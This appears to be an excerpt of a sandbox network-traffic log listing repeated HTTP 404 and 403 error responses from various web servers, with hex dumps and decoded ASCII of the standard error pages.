Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: privateContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/10.0X-Powered-By: ASP.NETDate: Mon, 20 Mar 2023 10:59:14 GMTConnection: closeContent-Length: 4960Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 31 30 2e 30 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 7b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 30 30 36 36 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 31 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 2e 63 6f 6e 66 69 67 5f 73 6f 75 72 63 65 20 63 6f 64 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 65 6d 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0a 70 72 65 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 65 6d 3b 77 6f 72 64 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 3b 7d 20 0a 75 6c 2c 6f 6c 7b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 31 30 70 78 20 35 70 78 3b 7d 20 0a 75 6c 2e 66 69 72 73 74 2c 6f 6c 2e 66 69 72 73 74 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 35 70 78 3b 7d 20 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 62 72 65 61 6b 2d 61 6c 6c 3b 7d 20 0a 2e 73 75 6d 6d 61 72 79 2d 63 6f 6e 74 61 69 6e 65 72 20 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 35 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 34 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 2e 6e 6f 2d 65 78 70 61 6e 64 2d 61 6c 6c 7b 70 61 64 64 69 6e 67 3a 32 70 78 20 31 35 70 78 20 34 70 78 20 31 30 70 78 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 2d 31 32 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 7b 63 6f 6c 6f 72 3a 23 33 33 33 33 33 33 3b 3b 6d 61 72 67 69 6e 3a 34 70 78 20 30 20 38 70 78 20 2d 31 32 70 78 3b 5f 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 70 78 3b 20 0a 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 3b 7d 20 0a 61 3a 6c 69 6e 6b 2c 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 30 30 37 45 46 46 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 6
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 20 Mar 2023 10:59:20 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 20 Mar 2023 10:59:22 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 20 Mar 2023 10:59:25 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 20 Mar 2023 10:59:28 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 Forbiddendate: Mon, 20 Mar 2023 10:59:33 GMTcontent-type: text/htmltransfer-encoding: chunkedvary: Accept-Encodingserver: NginXcontent-encoding: gzipconnection: closeData Raw: 36 45 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 56 70 cb 2f 4a ca 4c 49 49 cd b3 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f bf 20 35 af 28 b5 b8 a4 12 59 5e 1f 66 a2 3e d4 35 00 74 17 fb af 96 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6E(HML),I310Vp/JLII&T";Ct@}4l"(/ 5(Y^f>5t0
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 Forbiddendate: Mon, 20 Mar 2023 10:59:36 GMTcontent-type: text/htmltransfer-encoding: chunkedvary: Accept-Encodingserver: NginXcontent-encoding: gzipconnection: closeData Raw: 36 45 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 56 70 cb 2f 4a ca 4c 49 49 cd b3 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f bf 20 35 af 28 b5 b8 a4 12 59 5e 1f 66 a2 3e d4 35 00 74 17 fb af 96 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6E(HML),I310Vp/JLII&T";Ct@}4l"(/ 5(Y^f>5t0
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 Forbiddendate: Mon, 20 Mar 2023 10:59:38 GMTcontent-type: text/htmltransfer-encoding: chunkedvary: Accept-Encodingserver: NginXcontent-encoding: gzipconnection: closeData Raw: 36 45 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 56 70 cb 2f 4a ca 4c 49 49 cd b3 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f bf 20 35 af 28 b5 b8 a4 12 59 5e 1f 66 a2 3e d4 35 00 74 17 fb af 96 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6E(HML),I310Vp/JLII&T";Ct@}4l"(/ 5(Y^f>5t0
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Mon, 20 Mar 2023 10:59:54 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 11:00:07 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 11:00:09 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 11:00:12 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 11:00:14 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1238date: Mon, 20 Mar 2023 11:00:19 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1238date: Mon, 20 Mar 2023 11:00:22 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1238date: Mon, 20 Mar 2023 11:00:24 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 